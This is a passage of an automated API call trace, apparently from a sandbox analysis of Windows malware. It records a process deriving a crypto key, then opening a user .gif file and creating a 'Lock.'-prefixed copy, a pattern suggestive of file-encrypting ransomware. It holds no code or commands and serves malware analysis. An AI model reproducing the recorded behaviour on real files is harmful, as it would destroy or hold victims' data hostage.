| out: lpMsg=0x8cef58) returned 0 [0122.391] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa330, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0122.392] CryptHashData (hHash=0x9a4a40, pbData=0x2a72648, dwDataLen=0x3, dwFlags=0x1) returned 1 [0122.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.399] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.399] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.399] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.399] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.399] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa240, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0122.399] CryptDeriveKey (in: hProv=0x9bf088, Algid=0x6601, hBaseData=0x9a4a40, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a42c0) returned 1 [0122.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.400] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.400] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.400] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.400] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0122.400] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7020, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0122.400] CryptDestroyHash (hHash=0x9a4a40) returned 1 [0122.400] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.401] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/F74jGmHWDSdyxplK8Zu.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\f74jgmhwdsdyxplk8zu.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0122.401] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.401] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0122.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0122.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0122.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0122.402] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0122.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0122.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.402] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0122.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0122.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0122.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0122.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.F74jGmHWDSdyxplK8Zu.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.f74jgmhwdsdyxplk8zu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0122.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0122.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0122.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0122.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0122.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0122.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0122.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd0020 [0122.407] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0122.407] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0122.410] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x3aff, lpOverlapped=0x0) returned 1 [0122.410] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0122.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.410] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13aff) returned 0x2aaf410 [0122.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd0020 | out: hHeap=0x2af0000) returned 1 [0122.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0122.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0122.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0122.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13aff) returned 0x2ac2f18 [0122.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0122.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0122.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0122.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0122.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13aff) returned 0x2aaf410 [0122.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0122.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0122.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0122.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0122.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0122.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0122.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0122.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0122.419] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0122.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0122.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0122.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x13aff) returned 0x2aaf410 [0122.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 